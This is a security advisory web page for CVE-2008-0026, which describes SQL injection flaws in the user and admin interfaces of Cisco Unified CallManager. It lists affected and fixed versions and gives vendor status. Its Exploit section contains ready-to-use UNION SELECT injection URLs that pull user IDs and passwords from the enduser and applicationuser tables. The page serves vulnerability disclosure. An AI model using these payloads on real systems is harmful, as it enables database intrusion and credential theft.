Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2008-0026 to a friend New vulnerability? New tool? Tell us	CVE-2008-0026 Cisco Unified CallManager Multiple SQL Injections in User And Admin Interface     Credit: The information has been provided by Portcullis Computer Security. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2008-0026 Details Check for CVE-2008-0026 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Cisco Unified CallManager version 5.0.4.2000-1  * Cisco Unified CallManager version 5.1  * Cisco Unified CallManager version 6.0-6.1 Immune Systems:  * Cisco Unified CallManager version 6.1a  * Cisco Unified CallManager version 5.1(3a) The value of the 'key' parameter used in various GET requests is not properly sanitized and it is therefore possible to inject SQL queries. In addition, the application discloses table and attribute names in the 'primaryTable' and 'dispCols' parameters of some POST requests. Another SQL injection point can be found there. The following is a simplified POST request: POST /ccmuser/personaladdressbookFindList.do?%3C%=reqParams%%3E&recCnt=1&colCnt=4 HTTP/1.1 Host: example.org Referer: https://example.org/ccmuser/personaladdressbookFindList.do Cookie: JSESSIONID=D650CB2B43F85CD8D260B69A948FA7B5; JSESSIONIDSSO=315C472AA4B90A6765D4EDEFAC24897C Content-Length: 170 org.apache.struts.taglib.html.TOKEN=9a4f6e1e4e11a72ed4be0981c26e6f53& primaryTable=personaladdressbook&dispCols=pkid%23nickname%23firstname%23lastname& searchField=nickname Impact: Attackers need access to either the user or administration interface. They then might be able to read data from the database such as password hashes. Exploit: Proof of concept exploit code is not required. The injection points are the 'key' or the 'primaryTable' and 'dispCols' parameters. E.g.: https://example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ SELECT+'','',firstname,lastname,userid,password+from+enduser;-- or https://example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ SELECT+'','','',user,'',password+from+applicationuser;-- Vendor Status: Vendor contacted - Cisco advise that they will be using bug ID CSCsk64286 for this incident. The Cisco advisory is now available at: http://www.cisco.com/warp/customer/707/cisco-sa-20080213-cucmsql.shtml The vendor has advised that the CUCM versions not vulnerable to this issue are 5.1(3a) and 6.1(1a). CVE Information: CVE-2008-0026  Comments on CVE-2008-0026:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®